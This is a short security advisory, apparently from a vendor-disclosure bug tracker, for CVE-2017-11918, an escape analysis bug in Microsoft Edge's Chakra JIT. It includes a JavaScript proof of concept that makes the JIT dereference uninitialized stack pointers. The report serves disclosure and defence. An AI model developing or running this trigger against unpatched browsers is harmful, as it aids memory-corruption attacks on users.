Microsoft Edge Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
f49a75546e986ccb23882860abd5f185Microsoft Edge: Chakra: JIT: Escape analysis bug
CVE-2017-11918
Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Escape_analysis</a>
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
PoC:
function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];
}
function main() {
for (let i = 0; i < 0x1000; i++) {
opt();
}
print(opt()); // deref uninitialized stack pointers!
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt